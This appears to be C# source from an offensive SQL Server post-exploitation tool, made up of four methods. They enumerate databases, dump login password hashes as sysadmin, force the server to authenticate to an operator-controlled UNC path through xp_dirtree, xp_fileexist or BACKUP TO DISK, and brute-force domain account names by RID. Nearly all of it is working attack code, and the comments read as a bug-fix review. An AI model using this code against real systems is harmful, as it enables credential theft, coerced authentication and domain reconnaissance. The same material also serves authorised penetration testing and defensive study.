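/// <summary>
/// Enumerates databases on the target instance. The T-SQL is assembled from the
/// fixed fragments query1_2/query1_4 (plus query1_3 only when the major version is
/// above 10) and any of the optional filter strings, then run into <c>databases</c>.
/// </summary>
/// <returns>
/// <c>false</c> when the connection or the server-info lookup fails; <c>true</c> once
/// the enumeration query has run.
/// </returns>
internal override bool Query()
{
    // Leading SELECT columns tag every row with the host/instance it came from.
    // computerName/instance are written into quoted literals; they are the operator's
    // own arguments rather than data from the target, but an embedded quote would
    // still break the statement.
    string prefix = string.Format(
        "SELECT \'{0}\' as [ComputerName],\n" +
        "\'{1}\' as [Instance],", computerName, instance);

    int versionShort = 0;
    using (SQLConnection sql = new SQLConnection(instance))
    {
        sql.BuildConnectionString(credentials);
        if (!sql.Connect())
        {
            return false;
        }

        SQLServerInfo serverInfo = new SQLServerInfo(credentials);
        serverInfo.SetInstance(instance);
        if (!serverInfo.Query())
        {
            return false;
        }
        SQLServerInfo.Details details = serverInfo.GetResults();

        // The major version decides whether query1_3 is appended (> 10 only). A missing
        // or unparseable version previously fell through as 0 without a word, so the
        // fragment was dropped silently; the fallback is kept but now reported. A null
        // SQLServerMajorVersion used to throw NullReferenceException in Split.
        string majorVersion = details.SQLServerMajorVersion ?? string.Empty;
        if (!int.TryParse(majorVersion.Split('.').First(), out versionShort))
        {
            Console.WriteLine("[!] Unable to ascertain SQL Version; running the base query without version-specific columns");
        }

        StringBuilder sb = new StringBuilder();
        sb.Append(prefix);
        sb.Append(query1_2);
        if (versionShort > 10)
        {
            sb.Append(query1_3);
        }
        sb.Append(query1_4);

        // Optional WHERE-style fragments, appended in this fixed order when set.
        string[] filters = { databaseFilter, noDefaultsFilter, hasAccessFilter, sysAdminFilter };
        foreach (string filter in filters)
        {
            if (!string.IsNullOrEmpty(filter))
            {
                sb.Append(filter);
            }
        }

#if DEBUG
        Console.WriteLine(sb.ToString());
#endif
        databases = sql.Query<Database>(sb.ToString(), new Database());
    }
    return true;
}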
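/// <summary>
/// Retrieves login password hashes from the instance into <c>hashes</c>. The caller
/// must be sysadmin (verified through SQLSysadminCheck). QUERY1_1 is used when the
/// major version is above 8, QUERY2_1 otherwise; both are defined elsewhere.
/// The result is credential material — treat the in-memory rows and any output
/// produced from them accordingly.
/// </summary>
/// <returns>
/// <c>true</c> once the hash query has run; <c>false</c> when the connection fails,
/// the principal is not sysadmin, or the major version cannot be determined.
/// </returns>
internal override bool Query()
{
    using (SQLConnection sql = new SQLConnection(instance))
    {
        sql.BuildConnectionString(credentials);
        if (!sql.Connect())
        {
            return false;
        }

        if (!SQLSysadminCheck.Query(instance, computerName, credentials))
        {
            Console.WriteLine("[-] User is not Sysadmin");
            return false;
        }

        SQLServerInfo info = new SQLServerInfo(credentials);
        info.SetInstance(instance);
        // The lookup's result was ignored before; on failure the version string was null
        // and Split below threw NullReferenceException instead of a readable message.
        if (!info.Query())
        {
            Console.WriteLine("[-] Unable to ascertain SQL Version");
            Console.WriteLine("[*] It is possible to override this with the --version flag");
            return false;
        }
        SQLServerInfo.Details details = info.GetResults();

        int versionShort;
        string majorVersion = details.SQLServerMajorVersion ?? string.Empty;
        if (!int.TryParse(majorVersion.Split('.').First(), out versionShort))
        {
            Console.WriteLine("[-] Unable to ascertain SQL Version");
            Console.WriteLine("[*] It is possible to override this with the --version flag");
            return false;
        }

        // Two query variants: QUERY1_1 for major version > 8, QUERY2_1 for older servers.
        string query = versionShort > 8 ? QUERY1_1 : QUERY2_1;
        hashes = sql.Query<Hash>(query, new Hash());
    }

    // Previously 'return false' even after hashes had been populated, so a successful
    // dump was indistinguishable from a failure; the sibling Query() methods return true.
    return true;
}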
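/// <summary>
/// Makes the SQL Server service reach out to <c>uncpath</c>, presumably an
/// operator-controlled listener that observes the service account's outbound
/// authentication. Servers with major version below 11 are sent BACKUP LOG /
/// BACKUP DATABASE to the UNC path; 11 and above get xp_dirtree / xp_fileexist.
/// Each statement is run through the <c>_Query</c> helper.
/// </summary>
/// <returns>
/// <c>false</c> when the connection fails or the major version cannot be determined;
/// <c>true</c> once both statements have been issued.
/// </returns>
internal override bool Query()
{
    using (SQLConnection sql = new SQLConnection(instance))
    {
        sql.BuildConnectionString(credentials);
        // A failed connect used to fall through to 'return true'; the sibling Query()
        // implementations report false here and callers read the bool as success.
        if (!sql.Connect())
        {
            return false;
        }

        SQLServerInfo info = new SQLServerInfo(credentials);
        info.SetInstance(instance);
        // Result was ignored before; a failed lookup surfaced as a NullReferenceException
        // in Split rather than as the message below.
        if (!info.Query())
        {
            Console.WriteLine("[-] Unable to ascertain SQL Version");
            Console.WriteLine("[*] It is possible to override this with the --version flag");
            return false;
        }
        SQLServerInfo.Details details = info.GetResults();

        int versionShort;
        string majorVersion = details.SQLServerMajorVersion ?? string.Empty;
        if (!int.TryParse(majorVersion.Split('.').First(), out versionShort))
        {
            Console.WriteLine("[-] Unable to ascertain SQL Version");
            Console.WriteLine("[*] It is possible to override this with the --version flag");
            return false;
        }

        // uncpath lands inside a single-quoted T-SQL literal. It is the operator's own
        // argument, not target data, but an embedded quote will still break the statement.
        string firstQuery;
        string secondQuery;
        if (versionShort < 11)
        {
            // NOTE(review): both BACKUP statements name a hard-coded [TESTING] database and
            // will fail on a target where it does not exist — confirm this is intended.
            firstQuery = string.Format("BACKUP LOG [TESTING] TO DISK = \'{0}\'", uncpath);
            secondQuery = string.Format("BACKUP DATABASE [TESTING] TO DISK = \'{0}\'", uncpath);
        }
        else
        {
            firstQuery = string.Format("xp_dirtree \'{0}\'", uncpath);
            secondQuery = string.Format("xp_fileexist \'{0}\'", uncpath);
        }

        _Query(sql, firstQuery);
        _Query(sql, secondQuery);
    }
    return true;
}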
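/// <summary>
/// Enumerates domain accounts through the SQL Server. Resolves the SID of
/// <c>domainName\domainGroup</c> with SUSER_SID, keeps the first 24 bytes (48 hex
/// chars) as the domain prefix, then appends every RID in [start, end] and asks
/// SUSER_SNAME for the account name, collecting hits into <c>fuzzed</c>.
/// Note this issues one query per RID, so a wide range is correspondingly noisy
/// on the target.
/// </summary>
/// <returns>
/// <c>false</c> when the connection or server-info lookup fails, the group SID cannot
/// be resolved or is too short, or a result row fails to convert; <c>true</c> once the
/// whole RID range has been walked.
/// </returns>
internal override bool Query()
{
    using (SQLConnection sql = new SQLConnection(instance))
    {
        sql.BuildConnectionString(credentials);
        if (!sql.Connect())
        {
            return false;
        }

        SQLServerInfo info = new SQLServerInfo(credentials);
        info.SetInstance(instance);
        // Result was ignored before, leaving domainName null on a failed lookup.
        if (!info.Query())
        {
            Console.WriteLine("[-] Unable to query server information");
            return false;
        }
        SQLServerInfo.Details details = info.GetResults();
        domainName = details.DomainName;

        // domainName/domainGroup are written into a quoted literal; they are the
        // operator's own arguments, but an embedded quote still breaks the statement.
        string sidQuery = string.Format("SELECT SUSER_SID(\'{0}\\{1}\') as DomainGroupSid", domainName, domainGroup);
#if DEBUG
        Console.WriteLine(sidQuery);
#endif
        DataTable table = sql.Query(sidQuery);

        // SUSER_SID returns NULL for a principal it cannot resolve; the previous
        // unconditional (byte[]) cast threw InvalidCastException on that instead of
        // telling the operator what went wrong.
        DataRow sidRow = table.AsEnumerable().FirstOrDefault();
        byte[] sidBytes = sidRow == null ? null : sidRow["DomainGroupSid"] as byte[];
        if (sidBytes == null)
        {
            Console.WriteLine("[-] Unable to resolve SID for {0}\\{1}", domainName, domainGroup);
            return false;
        }

        string sidHex = BitConverter.ToString(sidBytes).Replace("-", "");
        // Substring(0, 48) threw ArgumentOutOfRangeException for anything shorter.
        if (sidHex.Length < 48)
        {
            Console.WriteLine("[-] Unexpected SID length ({0} bytes) for {1}\\{2}", sidBytes.Length, domainName, domainGroup);
            return false;
        }
        string baseSid = sidHex.Substring(0, 48);
        Console.WriteLine("Base SID: {0}", baseSid);

        for (int i = start; i <= end; i++)
        {
            // The RID follows the domain prefix as four little-endian bytes; this
            // replaces the earlier hex-string split/reverse/pad dance with an explicit
            // byte-order encoding that yields the same 8 lowercase hex characters.
            string rid = "0x" + baseSid + LittleEndianHex(i);
            string nameQuery = string.Format("SELECT SUSER_SNAME({0}) as [DomainAccount]", rid);
#if DEBUG
            Console.WriteLine(nameQuery);
#endif
            table = sql.Query(nameQuery);
            foreach (DataRow row in table.AsEnumerable())
            {
                try
                {
                    // NULL means no account carries this RID.
                    if (row["DomainAccount"] is DBNull)
                    {
                        continue;
                    }
                    Fuzz hit = new Fuzz
                    {
                        ComputerName = computerName,
                        Instance = instance,
                        SID = rid,
                        RID = i,
                        DomainAccount = (string)row["DomainAccount"],
                    };
                    fuzzed.Add(hit);
                }
                catch (Exception ex)
                {
                    if (ex is ArgumentNullException)
                    {
                        continue;
                    }
                    Console.WriteLine(ex.Message);
                    return false;
                }
            }
        }
    }
    return true;
}

// Encodes a 32-bit value as 8 lowercase hex characters, least-significant byte first,
// independent of the host's native byte order.
private static string LittleEndianHex(int value)
{
    return string.Format("{0:x2}{1:x2}{2:x2}{3:x2}",
        value & 0xff,
        (value >> 8) & 0xff,
        (value >> 16) & 0xff,
        (value >> 24) & 0xff);
}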